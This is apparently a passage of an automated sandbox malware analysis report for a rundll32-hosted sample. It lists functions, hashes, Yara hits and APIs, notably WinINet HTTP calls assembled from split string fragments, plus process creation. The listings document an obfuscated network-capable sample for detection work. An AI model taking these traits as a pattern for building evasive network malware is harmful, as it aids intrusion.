Associated: 00000006.00000002.3710698216.00000000044ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3710698216.000000000455E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_43c0000_rundll32.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b7dbc0b81287541b7a28e3f608aec81c5d4083a605d53fe7e1fb29a678992ae7
Instruction ID: ab9fe97fa546acfa74392035078212a67ebc553a97858a776a1989a4c36d3d97
Opcode Fuzzy Hash: b7dbc0b81287541b7a28e3f608aec81c5d4083a605d53fe7e1fb29a678992ae7
Instruction Fuzzy Hash: A990027520140402F5407158440474600058BE0305F55C012A5066558E879DDED56665

Uniqueness

Uniqueness Score: -1.00%

Function 04432F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04432F3A

Memory Dump Source

Source File: 00000006.00000002.3710698216.00000000043C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043C0000, based on PE: true

Associated: 00000006.00000002.3710698216.00000000044E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3710698216.00000000044ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3710698216.000000000455E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_43c0000_rundll32.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 45d699f2339a0b0bb5d99443bcad2aa10798124446b401dca36200abbfe79203
Instruction ID: da646d6bb82aadb9ea3417b9f3c6a2dd316f05c1a623d19aec97162573c6e872
Opcode Fuzzy Hash: 45d699f2339a0b0bb5d99443bcad2aa10798124446b401dca36200abbfe79203
Instruction Fuzzy Hash: 1A90026534140442F50071584414B060005CBF1305F55C016E1066558D875DDD526126

Uniqueness

Uniqueness Score: -1.00%

Function 04432FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04432FEA

Memory Dump Source

Source File: 00000006.00000002.3710698216.00000000043C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043C0000, based on PE: true

Associated: 00000006.00000002.3710698216.00000000044E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3710698216.00000000044ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3710698216.000000000455E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_43c0000_rundll32.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1e5c171031e28ec4189dd760d6faa974b85164ff5f34931c012a6729536dbd1a
Instruction ID: e90b87a044834980bdf480819d1f5b54f2b47db546bc6a96d54f44a157f0c4f4
Opcode Fuzzy Hash: 1e5c171031e28ec4189dd760d6faa974b85164ff5f34931c012a6729536dbd1a
Instruction Fuzzy Hash: 3D900225211C0042F60075684C14B0700058BE0307F55C116A0156558CCA59D9615521

Uniqueness

Uniqueness Score: -1.00%

Function 04432AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04432ADA

Memory Dump Source

Source File: 00000006.00000002.3710698216.00000000043C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043C0000, based on PE: true

Associated: 00000006.00000002.3710698216.00000000044E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3710698216.00000000044ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3710698216.000000000455E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_43c0000_rundll32.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 5714598df0fb29fbfacc608b196d97b3ad40c8709d50b117045488643ff9b885
Instruction ID: efb853235fc1a7b49fb0a6bb0b263a9064dafde8d2a5bd9bdebfa81d77f6c3d2
Opcode Fuzzy Hash: 5714598df0fb29fbfacc608b196d97b3ad40c8709d50b117045488643ff9b885
Instruction Fuzzy Hash: 3B90043D311400033505F55C07045070047CFF5355355C033F1017554CD775DD715131

Uniqueness

Uniqueness Score: -1.00%

Function 04432B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04432B6A

Memory Dump Source

Source File: 00000006.00000002.3710698216.00000000043C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043C0000, based on PE: true

Associated: 00000006.00000002.3710698216.00000000044E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3710698216.00000000044ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3710698216.000000000455E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_43c0000_rundll32.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 003efe39a4af6c5ecde742f9bcb20d7b3f3226e24c170690d139d71157749f43
Instruction ID: ec9eccf87c59279c9c348ab7c6094445047eba8a46b84fbd596d59e7a64dabb5
Opcode Fuzzy Hash: 003efe39a4af6c5ecde742f9bcb20d7b3f3226e24c170690d139d71157749f43
Instruction Fuzzy Hash: 9890026520240003750571584414616400A8BF0205B55C022E1016594DC669D9916125

Uniqueness

Uniqueness Score: -1.00%

Function 04432BE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04432BEA

Memory Dump Source

Source File: 00000006.00000002.3710698216.00000000043C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043C0000, based on PE: true

Associated: 00000006.00000002.3710698216.00000000044E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3710698216.00000000044ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3710698216.000000000455E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_43c0000_rundll32.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 160f56ba406fe82ee6820e441f5176987ce39e6f9e706c4fa45b1aae12b444b3
Instruction ID: 91aa0f9fb69c157797bf3221064a721100707a9f4630f9aaaee475b1a37d84f1
Opcode Fuzzy Hash: 160f56ba406fe82ee6820e441f5176987ce39e6f9e706c4fa45b1aae12b444b3
Instruction Fuzzy Hash: 1790023520544842F54071584404A4600158BE0309F55C012A0066698D9769DE55B661

Uniqueness

Uniqueness Score: -1.00%

Function 04432BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04432BFA

Memory Dump Source

Source File: 00000006.00000002.3710698216.00000000043C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043C0000, based on PE: true

Associated: 00000006.00000002.3710698216.00000000044E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3710698216.00000000044ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3710698216.000000000455E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_43c0000_rundll32.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f45676305e67c8ed8229375806923b28fe237cf6c0115f761247a799b2fd516d
Instruction ID: 48f5a68f49254d3c39a5a4578376263f04ce95111761525ab0558967ef8f33cb
Opcode Fuzzy Hash: f45676305e67c8ed8229375806923b28fe237cf6c0115f761247a799b2fd516d
Instruction Fuzzy Hash: E690023520140802F5807158440464A00058BE1305F95C016A0027658DCB59DB5977A1

Uniqueness

Uniqueness Score: -1.00%

Function 044335C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 044335CA

Memory Dump Source

Source File: 00000006.00000002.3710698216.00000000043C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043C0000, based on PE: true

Associated: 00000006.00000002.3710698216.00000000044E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3710698216.00000000044ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3710698216.000000000455E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_43c0000_rundll32.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2dcfbeb922c91a3f4b9ac82ac4f54d5ef21e0a0644bc18d51b7e210013722a77
Instruction ID: 2b52c2cd2883ba6bfcb54fd577b78fe945026f7f4c18d5ba849c9dfa0ed27490
Opcode Fuzzy Hash: 2dcfbeb922c91a3f4b9ac82ac4f54d5ef21e0a0644bc18d51b7e210013722a77
Instruction Fuzzy Hash: DC90023560550402F5007158451470610058BE0205F65C412A042656CD87D9DA5165A2

Uniqueness

Uniqueness Score: -1.00%

Function 0013AAD6 Relevance: 36.9, APIs: 2, Strings: 19, Instructions: 114
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

HttpOpenRequestA.WININET(RequestA,OpenRequestA,HttpOpenRequestA,00000000,?,?,?,?,?,?,?,00000000), ref: 0013AAC8
HttpSendRequestA.WININET(RequestA,SendRequestA,HttpSendRequestA,00000000,?,?,?,?,00000000), ref: 0013AB3C

Strings

InternetReadFile, xrefs: 0013AB9B, 0013ABA5
SendRequestA, xrefs: 0013AB32, 0013AB3A
HttpSendRequestA, xrefs: 0013AB2E, 0013AB39
Http, xrefs: 0013AA7A
RequestA, xrefs: 0013AAC2, 0013AAC7
RequestA, xrefs: 0013AB36, 0013AB3B
rnetReadFile, xrefs: 0013AB9E, 0013ABA6
estA, xrefs: 0013AA8F
HttpOpenRequestA, xrefs: 0013AA6D, 0013AA70
Requ, xrefs: 0013AA88
ReadFile, xrefs: 0013ABA2, 0013ABA7
Open, xrefs: 0013AA81
OpenRequestA, xrefs: 0013AABE, 0013AAC6
Http, xrefs: 0013AAFA
Send, xrefs: 0013AB01
Requ, xrefs: 0013AB08
HttpSendRequestA, xrefs: 0013AAED, 0013AAF0
HttpOpenRequestA, xrefs: 0013AABA, 0013AAC5
estA, xrefs: 0013AB0F

Memory Dump Source

Source File: 00000006.00000002.3695174278.0000000000120000.00000040.80000000.00040000.00000000.sdmp, Offset: 00120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_120000_rundll32.jbxd

Yara matches

Similarity

API ID: HttpRequest$OpenSend
String ID: Http$Http$HttpOpenRequestA$HttpOpenRequestA$HttpSendRequestA$HttpSendRequestA$InternetReadFile$Open$OpenRequestA$ReadFile$Requ$Requ$RequestA$RequestA$Send$SendRequestA$estA$estA$rnetReadFile
API String ID: 3451552748-2054597388
Opcode ID: 0dbb174b7c17f2240d41047fbca391ad1d8e60d455b670aa6199345fd679cfeb
Instruction ID: 26d8802f6d6f51591caf79fc4a7a8437a52cfdec6e8e5f3cd6ecc2c3f86cd01d
Opcode Fuzzy Hash: 0dbb174b7c17f2240d41047fbca391ad1d8e60d455b670aa6199345fd679cfeb
Instruction Fuzzy Hash: 4A413DB2904159AFCB14DF98D941AEF7BB9EF58310F148148FD59A7205D371AD10CBE2

Uniqueness

Uniqueness Score: -1.00%

Function 0013AA60 Relevance: 15.8, APIs: 1, Strings: 8, Instructions: 48
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

HttpOpenRequestA.WININET(RequestA,OpenRequestA,HttpOpenRequestA,00000000,?,?,?,?,?,?,?,00000000), ref: 0013AAC8

Strings

Open, xrefs: 0013AA81
Http, xrefs: 0013AA7A
OpenRequestA, xrefs: 0013AABE, 0013AAC6
RequestA, xrefs: 0013AAC2, 0013AAC7
estA, xrefs: 0013AA8F
HttpOpenRequestA, xrefs: 0013AA6D, 0013AA70
HttpOpenRequestA, xrefs: 0013AABA, 0013AAC5
Requ, xrefs: 0013AA88

Memory Dump Source

Source File: 00000006.00000002.3695174278.0000000000120000.00000040.80000000.00040000.00000000.sdmp, Offset: 00120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_120000_rundll32.jbxd

Yara matches

Similarity

API ID: HttpOpenRequest
String ID: Http$HttpOpenRequestA$HttpOpenRequestA$Open$OpenRequestA$Requ$RequestA$estA
API String ID: 1984915467-4016285707
Opcode ID: fea90beabff67b2b567d8da6d4b6fac2dcdbdf4ce93c97183384f69e53b9be53
Instruction ID: b1187466249586086c291591373f9f3cdcefcdafa15026d99775b607fbf3cdc2
Opcode Fuzzy Hash: fea90beabff67b2b567d8da6d4b6fac2dcdbdf4ce93c97183384f69e53b9be53
Instruction Fuzzy Hash: FC01E9B2905159AFCB04DF98D941DEF7BB9EB48210F158288FD48A7205D630ED10CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 0013AA57 Relevance: 15.8, APIs: 1, Strings: 8, Instructions: 46
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

HttpOpenRequestA.WININET(RequestA,OpenRequestA,HttpOpenRequestA,00000000,?,?,?,?,?,?,?,00000000), ref: 0013AAC8

Strings

Open, xrefs: 0013AA81
Http, xrefs: 0013AA7A
OpenRequestA, xrefs: 0013AABE, 0013AAC6
RequestA, xrefs: 0013AAC2, 0013AAC7
estA, xrefs: 0013AA8F
HttpOpenRequestA, xrefs: 0013AA6D, 0013AA70
HttpOpenRequestA, xrefs: 0013AABA, 0013AAC5
Requ, xrefs: 0013AA88

Memory Dump Source

Source File: 00000006.00000002.3695174278.0000000000120000.00000040.80000000.00040000.00000000.sdmp, Offset: 00120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_120000_rundll32.jbxd

Yara matches

Similarity

API ID: HttpOpenRequest
String ID: Http$HttpOpenRequestA$HttpOpenRequestA$Open$OpenRequestA$Requ$RequestA$estA
API String ID: 1984915467-4016285707
Opcode ID: ac8016c6176eb5f9dfdab1e198786557e5a61b74c5e8e088a9b1d181034b10df
Instruction ID: ea464e779caafa6e21b6ef12fe90ceafc0fd716e284acce3fa606488a02fcc11
Opcode Fuzzy Hash: ac8016c6176eb5f9dfdab1e198786557e5a61b74c5e8e088a9b1d181034b10df
Instruction Fuzzy Hash: A10105B2904159AFCB14DF98D981EEF7BB9EB48310F158248FE19A7204D731AA10CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0013AAE0 Relevance: 15.8, APIs: 1, Strings: 8, Instructions: 42
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

HttpSendRequestA.WININET(RequestA,SendRequestA,HttpSendRequestA,00000000,?,?,?,?,00000000), ref: 0013AB3C

Strings

SendRequestA, xrefs: 0013AB32, 0013AB3A
HttpSendRequestA, xrefs: 0013AB2E, 0013AB39
Http, xrefs: 0013AAFA
Send, xrefs: 0013AB01
Requ, xrefs: 0013AB08
RequestA, xrefs: 0013AB36, 0013AB3B
HttpSendRequestA, xrefs: 0013AAED, 0013AAF0
estA, xrefs: 0013AB0F

Memory Dump Source

Source File: 00000006.00000002.3695174278.0000000000120000.00000040.80000000.00040000.00000000.sdmp, Offset: 00120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_120000_rundll32.jbxd

Yara matches

Similarity

API ID: HttpRequestSend
String ID: Http$HttpSendRequestA$HttpSendRequestA$Requ$RequestA$Send$SendRequestA$estA
API String ID: 360639707-2503632690
Opcode ID: db97a3a7caecdf95fe0a304b753d44bd81bfc0f21146fd473aad3fd0d43d0554
Instruction ID: 4f2a83f37058c72b29d57c02b2547c7b524bff2d41e91e5060eb01111efec3f3
Opcode Fuzzy Hash: db97a3a7caecdf95fe0a304b753d44bd81bfc0f21146fd473aad3fd0d43d0554
Instruction Fuzzy Hash: C5014FB2905119AFCB04DF98D841AAFBBB8EB54210F148189FD18A7204D770EE10CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 0013A9E0 Relevance: 14.0, APIs: 1, Strings: 7, Instructions: 48
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetConnectA.WININET(ConnectA,rnetConnectA,InternetConnectA,00000000,?,?,?,?,?,?,?,00000000), ref: 0013AA48

Strings

ectA, xrefs: 0013AA0F
Conn, xrefs: 0013AA08
rnetConnectA, xrefs: 0013AA3E, 0013AA46
ConnectA, xrefs: 0013AA42, 0013AA47
rnet, xrefs: 0013AA01
Inte, xrefs: 0013A9FA
InternetConnectA, xrefs: 0013AA3A, 0013AA45

Memory Dump Source

Source File: 00000006.00000002.3695174278.0000000000120000.00000040.80000000.00040000.00000000.sdmp, Offset: 00120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_120000_rundll32.jbxd

Yara matches

Similarity

API ID: ConnectInternet
String ID: Conn$ConnectA$Inte$InternetConnectA$ectA$rnet$rnetConnectA
API String ID: 3050416762-1024195942
Opcode ID: 5a91d16494d0f57e6db0b04c43c500e05e142fe6b6b4993dc2c2e1d1dc4bd2c0
Instruction ID: ea3180bfba74327497d6e2389077a6c241ece9f32a18261b7dd1d6e980ac4561
Opcode Fuzzy Hash: 5a91d16494d0f57e6db0b04c43c500e05e142fe6b6b4993dc2c2e1d1dc4bd2c0
Instruction Fuzzy Hash: E701E9B2905118AFCB14DF99D941EEF77B8EB48310F154289FE08A7241D630EE10CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 0013A970 Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 41
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetOpenA.WININET(rnetOpenA,InternetOpenA,?,?,?), ref: 0013A9C7

Strings

rnet, xrefs: 0013A991
InternetOpenA, xrefs: 0013A9BD, 0013A9C5
Open, xrefs: 0013A998
rnetOpenA, xrefs: 0013A9C1, 0013A9C6
A, xrefs: 0013A99F
Inte, xrefs: 0013A98A

Memory Dump Source

Source File: 00000006.00000002.3695174278.0000000000120000.00000040.80000000.00040000.00000000.sdmp, Offset: 00120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_120000_rundll32.jbxd

Yara matches

Similarity

API ID: InternetOpen
String ID: A$Inte$InternetOpenA$Open$rnet$rnetOpenA
API String ID: 2038078732-3155091674
Opcode ID: a6bd7c6617a6fc903c9a7f07eed257647a49593ccfbd608e88943fc20d551768
Instruction ID: d43def3244b07c3dd38acc49cbcc7e03d79328f7e655c73c69498d7a1df979b9
Opcode Fuzzy Hash: a6bd7c6617a6fc903c9a7f07eed257647a49593ccfbd608e88943fc20d551768
Instruction Fuzzy Hash: 3FF019B2901118AFCB14DF98DC419EBB7B8EF48310F048589FE58A7201E731AE108BE1

Uniqueness

Uniqueness Score: -1.00%

Function 00139070 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(000007D0), ref: 00139118

Strings

wininet.dll, xrefs: 001390CE, 001390D7
net.dll, xrefs: 001390E1, 00139167, 0013913F, 0013914B, 00139173

Memory Dump Source

Source File: 00000006.00000002.3695174278.0000000000120000.00000040.80000000.00040000.00000000.sdmp, Offset: 00120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_120000_rundll32.jbxd

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: 4ed7dba718d4673b5d47752fdb7b5f00bd3c950a8118c2bc15652b3783fcf2b9
Instruction ID: 031c353cdd9bf1d8247946fdcfc08fc6f72505ad7931cbcf1220c9383cb9b8ba
Opcode Fuzzy Hash: 4ed7dba718d4673b5d47752fdb7b5f00bd3c950a8118c2bc15652b3783fcf2b9
Instruction Fuzzy Hash: 2931A1B2900745BBC724DF64C885FA7B7B8BB48B01F10841DF62E6B245DB74B550CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00139066 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 81
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(000007D0), ref: 00139118

Strings

wininet.dll, xrefs: 001390CE, 001390D7
net.dll, xrefs: 001390E1, 0013913F, 0013914B

Memory Dump Source

Source File: 00000006.00000002.3695174278.0000000000120000.00000040.80000000.00040000.00000000.sdmp, Offset: 00120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_120000_rundll32.jbxd

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: 9e09bd85b74c5dd54206fe4df8e4210c36e89762dd7db13e1e2b133ad30921b9
Instruction ID: 20f2451e209fdc82369f61565239d54908108cd05c35a0271874fbe31b82659b
Opcode Fuzzy Hash: 9e09bd85b74c5dd54206fe4df8e4210c36e89762dd7db13e1e2b133ad30921b9
Instruction Fuzzy Hash: 1831C1B2A40745BBC724DF64C8C6FABB7B8BB88701F10811DF6296B245D770A511CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0013A693 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 0013A724

Strings

)sEm, xrefs: 0013A699

Memory Dump Source

Source File: 00000006.00000002.3695174278.0000000000120000.00000040.80000000.00040000.00000000.sdmp, Offset: 00120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_120000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateInternalProcess
String ID: )sEm
API String ID: 2186235152-348409604
Opcode ID: 493f8ed14f7a509845512e168fdc389fd4f48330c8c50a1367e0c150ceccf56f
Instruction ID: 415c9aae3eeeaf6b656b2276f4b9efeb1b723eaf125cd7d6e549e0b289474073
Opcode Fuzzy Hash: 493f8ed14f7a509845512e168fdc389fd4f48330c8c50a1367e0c150ceccf56f
Instruction Fuzzy Hash: F5F092B2214009AF8B08DF8DDC90DEB73AEAFCC214B558219FA5DD3215D630EC51CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0013A652 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 28memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00123AF8), ref: 0013A68D

Strings

.z`, xrefs: 0013A67C, 0013A688

Memory Dump Source

Source File: 00000006.00000002.3695174278.0000000000120000.00000040.80000000.00040000.00000000.sdmp, Offset: 00120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_120000_rundll32.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: ec6dce930ad34ed308474acdbf942c3acf76682733a126d36dd40f7544e4c349
Instruction ID: d91fe38be3bb499f38d398b9810ac90314acd9d16e7168eb441b4d911dbd3e43
Opcode Fuzzy Hash: ec6dce930ad34ed308474acdbf942c3acf76682733a126d36dd40f7544e4c349
Instruction Fuzzy Hash: A3E06DB1240204AFDB18DFA4CC85EEB7B6CEF99310F048559FD5C9B251C631E814CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0013A660 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00123AF8), ref: 0013A68D

Strings

.z`, xrefs: 0013A67C, 0013A688

Memory Dump Source

Source File: 00000006.00000002.3695174278.0000000000120000.00000040.80000000.00040000.00000000.sdmp, Offset: 00120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_120000_rundll32.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction ID: ba9174473d512afbe68670cc8a1507377fb177b5d8c8fb597708f04c86961d8f
Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction Fuzzy Hash: ECE012B1200208ABDB18EF99CC49EAB77ACAF88750F018558BA5C5B242C630E9108AB0

Uniqueness

Uniqueness Score: -1.00%

Function 00128310 Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0012836A
PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0012838B

Memory Dump Source

Source File: 00000006.00000002.3695174278.0000000000120000.00000040.80000000.00040000.00000000.sdmp, Offset: 00120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_120000_rundll32.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 3172d27be0b016439e5481d8b21c313a41ffbcab7864ad54bb0489d0eefa33a4
Instruction ID: 2f2543b826ae587e16d99f45a413f24be17abd23a1b58a15c7cc09ffafb394fe
Opcode Fuzzy Hash: 3172d27be0b016439e5481d8b21c313a41ffbcab7864ad54bb0489d0eefa33a4
Instruction Fuzzy Hash: 05018F31A8122877E720A6949C43FBE776C6F50F51F050119FF04BA1C2EBA4B91647E6

Uniqueness

Uniqueness Score: -1.00%

Function 0012ACE0 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON

Download Yara Rule

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0012AD52

Memory Dump Source

Source File: 00000006.00000002.3695174278.0000000000120000.00000040.80000000.00040000.00000000.sdmp, Offset: 00120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_120000_rundll32.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
Instruction ID: c00fe3c02583c081de599f91ebb6c424413f71f4cc01fe494c0c7376c5d84b03
Opcode Fuzzy Hash: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
Instruction Fuzzy Hash: A6011EB5D4020DABDB10EAE4ED42F9EB3789F54308F104195E909A7241F731EB14CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0013A6CD Relevance: 1.5, APIs: 1, Instructions: 43processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 0013A724

Memory Dump Source

Source File: 00000006.00000002.3695174278.0000000000120000.00000040.80000000.00040000.00000000.sdmp, Offset: 00120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_120000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: e991c55cb4d201102235aea3611ade9c83a00b0a31524471731a2ae0ca180161
Instruction ID: 41e77a6739230129fca3fdb38e4af215dffd97778e57bfaaaf2267c2204845cf
Opcode Fuzzy Hash: e991c55cb4d201102235aea3611ade9c83a00b0a31524471731a2ae0ca180161
Instruction Fuzzy Hash: 340199B2210108AFCB58CF99DC81EEB37ADAF8C754F158258FA5DA7250D630E851CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0013A6D0 Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 0013A724

Memory Dump Source

Source File: 00000006.00000002.3695174278.0000000000120000.00000040.80000000.00040000.00000000.sdmp, Offset: 00120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_120000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction ID: cceb6cd1ed89e87a38e650bdd01df375d57b209efaffe2102de2bb9cd717ead0
Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction Fuzzy Hash: AD01B2B2210108BFCB54DF89DC80EEB77ADAF8C754F158258FA4D97241C630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 001391A0 Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,00000000,-00000002,?,00000000,00000000,?,?,0012F040,?,?,00000000), ref: 001391DC

Memory Dump Source

Source File: 00000006.00000002.3695174278.0000000000120000.00000040.80000000.00040000.00000000.sdmp, Offset: 00120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_120000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
